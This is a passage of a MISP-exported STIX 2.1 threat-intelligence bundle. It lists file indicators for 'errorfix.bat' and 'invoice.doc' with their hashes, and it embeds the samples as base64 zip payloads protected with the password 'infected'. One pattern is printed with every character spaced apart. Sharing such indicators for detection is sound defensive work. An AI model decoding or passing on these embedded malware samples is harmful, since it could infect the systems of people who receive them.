kEnAQfqcDshqcQQbpyqoPsx2jyrfwOo39y5Pr9O1L0iigr67DtJP9ZQLWUw9dZFzQ//FuIq/u4Jj8Dj8inDG/i+wKIo/1eZzpQY3jyBMgWy8C4mJn3mHQFooTUGIqMBgFEqoMSd9/zRyAeAvorOXqUPdKLLEQ8qJtYgZ22WuMnoDVoADwxwf9mIOnhDKFgFtNIjrm2iZLY++BqEebImNpybXs3lM0mQQvmf1R6QjfmnBxntEDcEz6n4MyxIkbTO2nMMKFZeGTdsYtonc6qloTt2xiwsWLT2COyJ8Lk+1glsUJLLYSwSu4SMmaXreJz6RKq04v3Ut7xZqXwbH7NYfvvnTQNdN38DJqLUjdgwsL03xDnUW6URiV60Zhb9s5S58KPOVos3zkstdNVYu/euAxu4cs5jf4bj7Yk004kFetRPeMRWfl8IQKT1xNeRiIeyDVu+lzn+PQrKhsid9e8DwOYZV8FITtz/+CUJEJWmy/9al+U+cjaCUjBd+VzQRtAL2wz+79+2I9+34qSjmTRt4O7Iibxwr772vb77esf6jzwxAEDn4qCnaJFNVKUp9fKj0Wx7Osj/2kDH5x6GPku8Ta1wpfl4P2yfpNMpnydaNEOouMV6dqZZ3696lHN9lQzjQVbzFGJcds8ZghFtYfyidKrCJoeHWE1xdGeK6QFr5YaYJ4xBrHecQZCSKSuD1rV3y75erjC7HadZJBbClRfpVe1suv5FfyYB3Zi35w2+uoz3e6qAvmOYzbNRP6q9aWqrtQccIpwbu1+Mgvd3pFbWlN2IlsB129QhXInYoGnRPqAIuol2EsRARGlLmzT7AH0/r6a6AiURdUP3DmEIRiiAVikZkU4nw5LdyReE2rrUjvF9vto+sXmbKxC+LP7vHTwruWbdszE+rXjgXi+G8q4bogcBdEYqzDwG+/Y1Ee6tifjSUHTaCZvHXMySuSFPnUrGXbw/9VYwdUHHzoHqldMSZvQdfA0PtDjwoSMXaDHn07MaQ7ljPpkgJWyLWa6MNEnB0/4ORNflCA0KzWrHmIR
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:25:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e67a35f-bc6c-4a73-901f-4d400a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:25:35.000Z" ,
"modified" : "2020-03-10T14:25:35.000Z" ,
"pattern" : "[file:hashes.MD5 = '4368db27ef2f07171c2c13d2e537d459' AND file:hashes.SHA1 = '7993ebdea9421a85b431077b2d89ee3344180759' AND file:hashes.SHA256 = '17b8571df60a9953f7e50edcd623eca414ce9bae64362ba3ab0069778cf40a1a' AND file:name = 'errorfix.bat' AND file:size = '2864' AND (file:content_ref.payload_bin = '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' AND file:content_ref.x_misp_filename = 'errorfix.bat' AND file:content_ref.hashes.MD5 = '4368db27ef2f07171c2c13d2e537d459' AND file:content_ref.mime_type = 'application/zip' AND file:content_ref.encryption_algorithm = 'mime-type-indicated' AND file:content_ref.decryption_key = 'infected')]" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:25:35Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e67a3aa-e8c0-4340-8080-475b0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:26:50.000Z" ,
"modified" : "2020-03-10T14:26:50.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' d 627615 f 955 d d 5342 e f 6 b 4 c 6938 a d 98 c ' A N D f i l e : h a s h e s . S H A 1 = ' 645467 b 3207 a 50 c 43 b e 0 75 a 0 b 81308 a 5 f 6935 c 59 ' A N D f i l e : h a s h e s . S H A 256 = ' 1 a 508909 a 8 e f 0 20 a b 5285 c e 47106 b e a c 317 c 2 a e 0 d 2971 e f f 9 a 4 f 95 a 5079 e e e 7 f ' A N D f i l e : n a m e = ' i n v o i c e . d o c ' A N D f i l e : s i z e = ' 441560 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A F l z a l C T 1 q s A I o E G A N i 8 B g A g A B w A Z D Y y N z Y x N W Y 5 N T V k Z D U z N D J l Z j Z i N G M 2 O T M 4 Y W Q 5 O G N V V A k A A 6 q j Z 16 q o 2 d e d X g L A A E E I Q A A A A Q h A A A A Z p q + + X 3 m / H u T B Y L Q Y j 5 n O g P E O J O 98 L 9 y 9 b o u + 7 I g L 12 j M o e R + p E h 9 V O r 8 j t k y A M j E R J 3 l k M Q L 86 M 5 U K L R 2 a 0 v N L r i q r z U x e 8 S r s N r V q Y M V m I S d 9 R P v Z j W e R b T A w I a x K 8 E w e 0 r X Z z I U N v H w 9 T 8 b M n 5 c w T P 9 b h s 84 u 2 M J e U M S V T S w H z I I n N B W 3 G 1 A w W h L e Y i C 1 I 71 V T Q y r I 97 X M V Q t d K W v a q O H N k a E + S K 5 w a 5 z y q Y A s g R j m F 5 G u 61 Y b U 7 l t D Z u q g O m I y R L 15 k A G E V Z Y Q F I k 9 P l e r k Z w I 0 8 v x 5 G U 1 I u 9 w R n 7 p G H N m W O g 8 B s 2 t 3 b 4 V 2 m j L U 2 I T k L w t o n M Z 0 0 u y Z 7 I 38 O A 3e3 R E K 2 X M t m b 5 g u 0 X k w 2 J g V g g D 1 n n u d i + h / O o s s E G V z W a o 87 o t n 95 L f x u 5E3 c O s 5 b I V G 6 U v O A l g c f Y K L F + N c Y 4 T 1 U 7 k T t W q R F j U 5 p + p T C F Q 5 N W / o C + M J N G G 3 S Z Y a B x 9 N i 4 m D j F P S c W 0 V l s 1 y 0 l 71 Q 7 T 4 / c b Q n U M i H 6 + m 4 s C x k V G d T T r Y p g 6 n 4 A p m 2 Q C k 0 W S s n S X S B q 9 U y 1 p m D m a e + t y l Q m Z 6 M P b o N f 1 N y v h f s L 2 / N i I a 0 7 E o S v I 7 J q v A + R H L A c v M r 0 M + 77 d r v f h N o A + u 8 N k V x t i 6 C 1 o L H s l 97 Y 
K y I q e Y j / b A 1 i Q d F a L / W r y D 8 Z c / E i K f t b v l U d A g i q b l f S b J 4 W / k c A V g V F B 9 w O I b T u 5 S 6 t N + 51 g S G y g o Q 9 J A l e u m 7 T U M T V c 8 t h m H B + a E 9 O p M c J I Z q Q Q V 5 W Z X J c X M a X a p l 9 + 7 b n m f s f 1 A s V 5 Y j s M o 3 U F 9 P e 7 O 1 M O 9 B v F e 9 a C f X B P f r o u G d N 0 7 M F J T p d Z r z L N b v r A 26 m / j q G 9 C 8 A g o K r r B V q L / + 2 p M F S D S Q f 3 h J J C 6 Z r d V B 8 a 2 U f H 7 i g E z T o 6 s k 0 B Y P U a Y 1 u A W z 63 K V a z b j l b a E h j L t 86 c x R o T 0 B 70 u 4 t 5 S U A f O P X P s X w T F 9 G s 7 j Z 74 r b A G C h B J 8 t R h c m H S j Z O j b 7 m E 6 d 9 Q m z H V Y T U u N D w s A n b 8 H O y T 88 M A c O r m / m W l y b C v M k V s Q 7 k R 0 l 7 W c X i v W b E z 6 y l K t 8 A l C N q 1 Z G M 8 b K m d 6 Y l n t T d l + q E N f l i h w z D K k X Z y p i S R x h x j S 1 m T K 0 Q q 3 x b F g q l / g y f m s E p n d N W z C 89 C 6 j v n 9 F 2 B 3 l S E e u 0 f 3 N I w S g s L H q 5 T W + W S g Y c q q t Y c J 0 X t r s S P a z z 0 Y 9 a L 12 Z 71 X L o 5 m k u n R + Z I K 2 z u W Z k z W 94 T R t I 9 p e i F h I j J o 2 C V C I F Y m L l x Q J l a s 2 / k K o y C u q j F x 1 P 6 x S m i g L k Z X P 8 V 5 d Y 8 z / e S S r B X E T C E z D V 9 l z 8 n x f w i 6 j K U c i J / K 4 n c C M 6 e E s J e E L w o H J L N U h H x T K c B U q 7 k 9 G Y J R P q I l + L w c o H 4 P e G q q j C 5 B M p j W q w q D 859 + Q + d D 6 M r T K m i r t W J 6 o c n E B V y t M v 0 z C 0 v d 6 r N q C l K 9 s q V I G D l g 85 v A u D b a W 2 D 0 f x z J m Y 655 H 5 z R p o e P 4 s A F v C 6 U 6 w A h v f A E v a D J s D 4 F E j B h k k N H + B 4 R z D G U H 752 N i X J Q P j w y Y w e 4 U S g z p x t z c J n 15525 b u n C 7 v 1 G R l x C a g e k u l Q T 5 R j Q T A e w 49 Z 1 W T j d f / S M i z Z p R l m I E t B y b w 1 p F 1 X i e y E L 7 m / 9 H P S Y L o / y Q i a + p a J b B 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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:26:50Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}